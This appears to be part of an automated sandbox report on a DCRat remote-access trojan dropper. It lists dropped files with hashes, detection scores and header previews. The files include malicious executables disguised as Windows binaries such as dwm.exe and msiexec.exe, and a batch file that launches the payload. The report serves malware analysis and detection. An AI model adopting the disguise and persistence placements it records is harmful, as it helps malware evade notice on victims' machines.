SHA-512:	AF36493EEF4FC46CF00D7E15AADFE7919B3D685DD91533ACC8B8799CF7323B8286F1F1247041B2142B78AC9A630D36134B8AAFF34556D8CE1148A077762CCEF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`c`.....................,......~.... ........@.. .......................`............`.................................0...K.... ..d....................@....................................................... ............... ..H............text........ ...................... ..`.sdata...$.......&..................@....rsrc...d.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\6cb0b6c459d5d3455a3da700e713f2e2529862ff Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	397
Entropy (8bit):	5.878391430290922
Encrypted:	false
SSDEEP:	12:vPq1tSMGlX0DnWhSTBC2c/DbfR9JzB/bG:HqXPGV0DWhcIVZ/bG
MD5:	28F2887079B9103C5721A955A5941646
SHA1:	39C60598217172CE3A24B3D96F0CB55065CDAEF7
SHA-256:	D60327B2D155E239359D2CDFBC19797B679CBE6155B7E9CECE22FC650A11CE05
SHA-512:	353314E257F1153C3204F6DCF72819BCD6CDA817D1332EB9F6D3BC39917E72350E718E6276A4206035FB376AB35E951C1610CD40B5EEA1961D166A553BFC0C42
Malicious:	false
Preview:	mc2DrQfvPyaQNci7tgILnVgsQPLJONgfSUFwxQFKIc01O3Jq7AqkT9uQ5JxbEWgBS583WvJca7CLepdWFfMOg5MSkz0odoFw6zjT4QUL1NJV6jwQpaWjKSeXspSh4e9w2QPpFKbzKAXTv0WADk9DRgloUMlP7xQWOWdpUHLf8gYJ4Ll1TReUf5fVpkU3jM1XuBEZXqq6YdEuHbtJlt5pS50S1HAtwR6vpBZ3HLemli5B1uON1KSzQLEyKvhPp7JHhTFGCzCZOSEuAzbH3x1m9Gee6ktVnO7oZyehoHLBI2l7GUyVUaW1FgHbylKbGrvAVaVLU3cwm0eHfgXlwXBN2Fj2rCtD6t5aHlmq8nAa8jPPCA5RNiosqhHP1deRKYz24D944qnJXkPS0

C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648192
Entropy (8bit):	6.199573872988717
Encrypted:	false
SSDEEP:	6144:QmHYWuNg9I204YuTsCJRDR0KJp12d7m505bTz2XQnIsh9JUgLzA7w9phShoR9pid:QhT8rR03yQnIUUgo7qSh8Rqn
MD5:	241F61E88F1F7B6ACF5B199B33CB84B9
SHA1:	FB820F9EBA08675BDCE29E626C607E0A73AF6053
SHA-256:	F85BABE98AE9D9BC5BF6A8942ECDAE3476F6755E3564CB6C5524E003662EAC49
SHA-512:	AF36493EEF4FC46CF00D7E15AADFE7919B3D685DD91533ACC8B8799CF7323B8286F1F1247041B2142B78AC9A630D36134B8AAFF34556D8CE1148A077762CCEF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`c`.....................,......~.... ........@.. .......................`............`.................................0...K.... ..d....................@....................................................... ............... ..H............text........ ...................... ..`.sdata...$.......&..................@....rsrc...d.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\audiodg.exe.log Download File
Process:	C:\Windows\AppReadiness\audiodg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	5.3694638062396685
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AokH+++vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAokKZPStzG1eqKPz
MD5:	4EE7F7D8422D070199D513A86F845641
SHA1:	922F2A2821AE728683DF2648619742886C4B21A0
SHA-256:	237675137C9AE1DFA6166434D505EFA1EF9C1A24B2D926F7344C96E059C20DB2
SHA-512:	EB9EA531F158F8EA97F439EB7D465EA4945964D8F5B0AA4D530F0041BB1B6007B97BD5308B174CA6EF09721E51FD46D7A4ED0DF1914DCB5A13E06E6DBDE539B4
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log Download File
Process:	C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	5.3694638062396685
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AokH+++vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAokKZPStzG1eqKPz
MD5:	4EE7F7D8422D070199D513A86F845641
SHA1:	922F2A2821AE728683DF2648619742886C4B21A0
SHA-256:	237675137C9AE1DFA6166434D505EFA1EF9C1A24B2D926F7344C96E059C20DB2
SHA-512:	EB9EA531F158F8EA97F439EB7D465EA4945964D8F5B0AA4D530F0041BB1B6007B97BD5308B174CA6EF09721E51FD46D7A4ED0DF1914DCB5A13E06E6DBDE539B4
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log Download File
Process:	C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	5.3694638062396685
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AokH+++vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAokKZPStzG1eqKPz
MD5:	4EE7F7D8422D070199D513A86F845641
SHA1:	922F2A2821AE728683DF2648619742886C4B21A0
SHA-256:	237675137C9AE1DFA6166434D505EFA1EF9C1A24B2D926F7344C96E059C20DB2
SHA-512:	EB9EA531F158F8EA97F439EB7D465EA4945964D8F5B0AA4D530F0041BB1B6007B97BD5308B174CA6EF09721E51FD46D7A4ED0DF1914DCB5A13E06E6DBDE539B4
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msiexec.exe.log Download File
Process:	C:\Windows\System32\d3d9on12\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	5.3694638062396685
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AokH+++vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAokKZPStzG1eqKPz
MD5:	4EE7F7D8422D070199D513A86F845641
SHA1:	922F2A2821AE728683DF2648619742886C4B21A0
SHA-256:	237675137C9AE1DFA6166434D505EFA1EF9C1A24B2D926F7344C96E059C20DB2
SHA-512:	EB9EA531F158F8EA97F439EB7D465EA4945964D8F5B0AA4D530F0041BB1B6007B97BD5308B174CA6EF09721E51FD46D7A4ED0DF1914DCB5A13E06E6DBDE539B4
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sessionhostmonitorSavesruntimeNet.exe.log Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	5.3694638062396685
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AokH+++vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAokKZPStzG1eqKPz
MD5:	4EE7F7D8422D070199D513A86F845641
SHA1:	922F2A2821AE728683DF2648619742886C4B21A0
SHA-256:	237675137C9AE1DFA6166434D505EFA1EF9C1A24B2D926F7344C96E059C20DB2
SHA-512:	EB9EA531F158F8EA97F439EB7D465EA4945964D8F5B0AA4D530F0041BB1B6007B97BD5308B174CA6EF09721E51FD46D7A4ED0DF1914DCB5A13E06E6DBDE539B4
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst

C:\Users\user\AppData\Roaming\DCRatBuild.sfx.exe Download File
Process:	C:\Users\user\Desktop\Donate_Caper_Fixed.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
Category:	dropped
Size (bytes):	671048
Entropy (8bit):	7.781469864458395
Encrypted:	false
SSDEEP:	12288:BUomEFRu3xEPEj7Gi4ied/CTjf4YpmXlGsjaJ5jPiq:/mOMSPEj7GXfmjf4YpygsuJ5H
MD5:	31611592B3DC60CF3559588EE4DC48D3
SHA1:	4729C99A71A638245BBDE0980DAC446F7C638F35
SHA-256:	D53E5EEAC98FC14EDF993CC890C6C39588F8F9622FAC6055CE3F19B67A4582A4
SHA-512:	0FF9170999F8A8E6EA14C68787AC1E4B740028F342D83F0587DD85931F4410541E6907C81D89EFCB8C50A3DC136FC85DE4401D57939AF0C302946A04227BB01E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.E.Ka..Ka..Ka..3...Ka..3..HKa..3...Ka..K`./Ka..3...Ka..3...Ka..3...Ka..3...Ka.Rich.Ka.................PE..L...+<.S..........................................@..........................`...................................... ...3................D.............................................................@...............d............................text...S........................... ..`.rdata..SO.......P..................@..@.data...............................@....rsrc....D.......F..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Donate_Caper2021.exe Download File
Process:	C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	965296
Entropy (8bit):	6.487224868050141
Encrypted:	false
SSDEEP:	12288:aRZ+IoG/n9IQxW3OBsee2X+t4RbjhT8rR03yQnIUUgo7qSh8Rqnf:U2G/nvxW3Ww0tjhYr6xn/oWe8R+f
MD5:	8C0FB72C8051214BC9581F4948D04478
SHA1:	B1C513105953AF4DE1EFF983BBD504BAC6B74325
SHA-256:	0F10B4AEAE950074D7874C2B3051732D03A11ACDD5C7BFEA72AE89B16604A10A
SHA-512:	7295024A2F002B4E3EA3D1F73B1BEB8AF23BEE6B4BBAE1770A9184D6D867078DAE913D7464BAB5125211D8220E777E2BB4DA57594E9D012A0BADEC0FEF9E0777
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe Download File
Process:	C:\Users\user\Desktop\Donate_Caper_Fixed.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
Category:	dropped
Size (bytes):	670421
Entropy (8bit):	7.781236649471806
Encrypted:	false
SSDEEP:	12288:BUomEFRu3xEPEj5HSmUL/4GoCBjZjwZtdS6eCL964+lCO61fyxE:/mOMSPEj5HSmO/4GoqjOd7eCZ+561fyy
MD5:	A41B479849B06E8F0DAEA6AAFA5C79BE
SHA1:	F07FC9E28FFC0E02A50215916743D477BDB41BCE
SHA-256:	8C44636C512FAC130B8727B869331BDAA9588515C68E0348415F935B060F5D6C
SHA-512:	BA316EF7E76331E6C06A9C296919A0B8B17C33F734F86F84A05429FFC2ED260C6A72EEFB35E78DC32971F2FB086BB0C42E0047552CC8919F11F797310B803A6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.E.Ka..Ka..Ka..3...Ka..3..HKa..3...Ka..K`./Ka..3...Ka..3...Ka..3...Ka..3...Ka.Rich.Ka.................PE..L...+<.S..........................................@..........................`...................................... ...3................D.............................................................@...............d............................text...S........................... ..`.rdata..SO.......P..................@..@.data...............................@....rsrc....D.......F..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ks4.021.3.10.391ru_25000.exe Download File
Process:	C:\Users\user\Desktop\Donate_Caper_Fixed.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2784144
Entropy (8bit):	7.59410986519191
Encrypted:	false
SSDEEP:	49152:K47Nlau3ZBJvDrU+RiTA4F5jg8rhwxR4hkHM/MM/G9Vm5+lMMNrukoDeYQ7M8q:KeNlau3/JUEn4FW8Vwxihks/MhasupJP
MD5:	A2DFB6D667C39677E95DA34CC7F247F8
SHA1:	8EA12FDF93D35B0DA419B49FD861F563AB7512E3
SHA-256:	54515B427C54D2D2D5A1B8EF00BACDF413914781F94D9B860F7866C0BBFC6389
SHA-512:	F0A5A0D3EB746DB1DDB0427E88E9E31F4431CD84C186C1AD7B82F25C5BAC606B55E1003DA50719D13CFDA4BB6E257D7CDA3B861D167E4EB23D6ABD30CAABCED9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.!...O...O...O.l.L...O.l.J...O.l.K...O.[.L...O.[.K.-.O.[.J.v.O.l.N...O...N...O...F...O.......O......O...M...O.Rich..O.........................PE..L..._5.B......................%......$............@.....................................@.................................,...(.........#..........V..%......D......p...............................@...............0.......`....................text............................... ..`.rdata...p.......r..................@..@.data...,\...0...$..................@....didat...............6..............@....rsrc.....#.......#..8..............@..@.reloc...D......F.................@..B................................................................................................................................................................................................................................................

C:\Windows\AppReadiness\42af1c969fbb7b2ae36b0e06bea61fc9a154b4af Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.321928094887362
Encrypted:	false
SSDEEP:	3:WZn:y
MD5:	179B7853203EC8914C4D0D81477A736A
SHA1:	30E60A6BE5DF861DEBF514D68A922BA47405FF2C
SHA-256:	62280D861A79F4A5D11B64819DD7F6203BCEC5940FE5214AA6EC000AEE7E8CDE
SHA-512:	6C8FC0591257A6341D896356B57D7F58D4A980D63A322D9AF9BDFE092E2DF9416F7DFF9EB7F7322E715D5B6A44812BEF13559DDD9592015F271EB1ED90D29374
Malicious:	false
Preview:	NymCdQ5AwX

C:\Windows\AppReadiness\audiodg.exe Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648192
Entropy (8bit):	6.199573872988717
Encrypted:	false
SSDEEP:	6144:QmHYWuNg9I204YuTsCJRDR0KJp12d7m505bTz2XQnIsh9JUgLzA7w9phShoR9pid:QhT8rR03yQnIUUgo7qSh8Rqn
MD5:	241F61E88F1F7B6ACF5B199B33CB84B9
SHA1:	FB820F9EBA08675BDCE29E626C607E0A73AF6053
SHA-256:	F85BABE98AE9D9BC5BF6A8942ECDAE3476F6755E3564CB6C5524E003662EAC49
SHA-512:	AF36493EEF4FC46CF00D7E15AADFE7919B3D685DD91533ACC8B8799CF7323B8286F1F1247041B2142B78AC9A630D36134B8AAFF34556D8CE1148A077762CCEF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`c`.....................,......~.... ........@.. .......................`............`.................................0...K.... ..d....................@....................................................... ............... ..H............text........ ...................... ..`.sdata...$.......&..................@....rsrc...d.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\d3d9on12\133006b48fb54b65ec2045921283a18304e24d5a Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.746588091472879
Encrypted:	false
SSDEEP:	6:aWWFD5qo5wmWufs7ygG6C2MU0OhZCebp9BVVGCydLRg7nVh7:aRl5qo5RWuKyJyM5debpDVVG3dLKb7
MD5:	2F4B1B8B577AF8DFBBC409B96478F239
SHA1:	301AE1896BC0E4A043DBD484BB3B92214FF3C080
SHA-256:	976F4FB797A107530141A5228F48FFE5ABA7AB28B3567B7D39C5F218A1A5F833
SHA-512:	EEE5B42686E87EBF4F68E37F2D3B96FED6DA09135D0A89856E9F31A14AF31262C8B81030CE505FB32AECF6566ADDF9BF00130651C978A2166D190022BC4E2795
Malicious:	false
Preview:	FxU93uZFgAoPiAcVLy3x7M3GdCGzKs9vPvnM2ztSDLZAHHWHc4r0RWT23Og1nj4yA2AxXPcVFluwx38Vp9XQBJe3bvToS2oeQkAOGjuMbVvqmhEAPKLoMow1YGVm6yCN6PgM3uOGOKyqXyR4qSYIq9RmyIzANIQnSitWB1He5EZBzGdjzb5nZ4g673Yu4O3G4LXzF43yL3MmjQxrpQKvMmOXBwYHdWjqKTHnsne4iHbfr3WrGrEoEH4R7AySgvVyUgbQJJ9CwPNELsqHZrBwS5mCY0qszLYwwm

C:\Windows\System32\d3d9on12\msiexec.exe Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648192
Entropy (8bit):	6.199573872988717
Encrypted:	false
SSDEEP:	6144:QmHYWuNg9I204YuTsCJRDR0KJp12d7m505bTz2XQnIsh9JUgLzA7w9phShoR9pid:QhT8rR03yQnIUUgo7qSh8Rqn
MD5:	241F61E88F1F7B6ACF5B199B33CB84B9
SHA1:	FB820F9EBA08675BDCE29E626C607E0A73AF6053
SHA-256:	F85BABE98AE9D9BC5BF6A8942ECDAE3476F6755E3564CB6C5524E003662EAC49
SHA-512:	AF36493EEF4FC46CF00D7E15AADFE7919B3D685DD91533ACC8B8799CF7323B8286F1F1247041B2142B78AC9A630D36134B8AAFF34556D8CE1148A077762CCEF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`c`.....................,......~.... ........@.. .......................`............`.................................0...K.... ..d....................@....................................................... ............... ..H............text........ ...................... ..`.sdata...$.......&..................@....rsrc...d.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\wlanapi\UsoClient.exe Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648192
Entropy (8bit):	6.199573872988717
Encrypted:	false
SSDEEP:	6144:QmHYWuNg9I204YuTsCJRDR0KJp12d7m505bTz2XQnIsh9JUgLzA7w9phShoR9pid:QhT8rR03yQnIUUgo7qSh8Rqn
MD5:	241F61E88F1F7B6ACF5B199B33CB84B9
SHA1:	FB820F9EBA08675BDCE29E626C607E0A73AF6053
SHA-256:	F85BABE98AE9D9BC5BF6A8942ECDAE3476F6755E3564CB6C5524E003662EAC49
SHA-512:	AF36493EEF4FC46CF00D7E15AADFE7919B3D685DD91533ACC8B8799CF7323B8286F1F1247041B2142B78AC9A630D36134B8AAFF34556D8CE1148A077762CCEF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`c`.....................,......~.... ........@.. .......................`............`.................................0...K.... ..d....................@....................................................... ............... ..H............text........ ...................... ..`.sdata...$.......&..................@....rsrc...d.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\wlanapi\f21121a732137268705c39e5401db38da50b4de6 Download File
Process:	C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	711
Entropy (8bit):	5.874090054784289
Encrypted:	false
SSDEEP:	12:gq6VpPYjELtvQp/lyiAiz2TVEHDO3hbcSsgTcoFdLmga1vYKi7j2Ahm4lNNXF/lh:gq6LYjELip/lyix2TVcO3pceX3yPvYLb
MD5:	45A3377A485B6CD583FA36E595EF5A25
SHA1:	C4EDF85C9BA92C729FD6EB7180776416F707243D
SHA-256:	4AAA19C83FF3D69C40DB714B352FF846FCF92E101FF9E6446442807376802809
SHA-512:	C154720ACC5AABD4696FE9A26C7874D348D7935017153EC0E58FCA5E9B94D65D7DA5FA3D256EA12F6BBE538019291185A87C609DA1FACCD18ECC0234757C65EE
Malicious:	false
Preview:	C2y4zGOUq2zujgY3Y2TcQMk1bSihepUIEEPDxIitcYJTjBNGwRDNPdbzS7chhqzAiqpfQVFQUj92DQSZFcuMmG3knZu0pBMwiIv2WszbLw3qdiwBpDbF5mYbxE11kPkSWNU5fZCXmTBzNNGEntLmjG05uTFR0806MkTQN0gPAEcmliOj7xN1E8tPWYLMUvhocEnm301wM5lfoOUMEfTCu92O0D3ypT5PgxJh4lpH5aoIWOlIE8Hybe3dLZv07CG3AW80FwRczMHUUu1mcvuqMGxC4pVfzzK3TvIAQuCRro8OXjJbhJYLRaq3i66abvmACNAil1Vrsc9hIjoUg37qb8l3EObUymz5B8MKikzqxrczaIv9Rl4ix6jElHeWaB2GmDgJWev5DR2tfwc5dbCMsRHEZHibGcQvyWMXmlmxz8egEzizoi389pYU5buP6UzkBG5JjET2zPXtwlAjjsxijRwI71cL1X1fI4e73YPjOAJuSohTaKpNhRAtUwLrmHBbY1l2GCqLdNTiIB0TTIuqrn713unHMi7H9rWaDpMYeeuT8blS62XdXUtu3t9VYj85QLjapZQo5WMN3o3bJVKUKdup8lgTp195gyDw2LmglthBIg0P0iMDYouwb3bE269EWQrEkGi7sosa6tgcvQdGo5h2EQV8tinptco1zvpuAPVu5U0sX9Tmd2aatyATvjNKADrdEpm

C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat Download File
Process:	C:\Users\user\AppData\Roaming\Donate_Caper2021.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.858284215843026
Encrypted:	false
SSDEEP:	3:I5xMyT02TvAxRJA2AEn:IvMyT02TvAXO2AE
MD5:	94BB39FC1A2671AD9917F901FFD22DD1
SHA1:	DD424B9592C54CB0828CA3C939B827C3B5BF34BF
SHA-256:	0D0EAB5F5D6496A1C90FFF02ED1F3A9B57F04B78EBAA19FF18C90EA04266E77E
SHA-512:	8EAFE1EFC1E1781AF3A0276CEBEE58A7B3D0FDB7DD04C12E27647CB4BBB2E988391A393361356A04071C40E2186AD6D661619C9B6F7779AAE2DDAA647F154BF5
Malicious:	false
Preview:	"C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe"

C:\sessionhostmonitor\RfInN2Wh.vbe Download File
Process:	C:\Users\user\AppData\Roaming\Donate_Caper2021.exe
File Type:	data
Category:	dropped
Size (bytes):	215
Entropy (8bit):	5.762160278748052
Encrypted:	false
SSDEEP:	6:GigwqK+NkLzWbHK/818nZNDd3RL1wQJRbdy7xUvr1s:GoMCzWLKG4d3XBJais
MD5:	FE8CABDE1ACFC7D86656013897CDA9D3
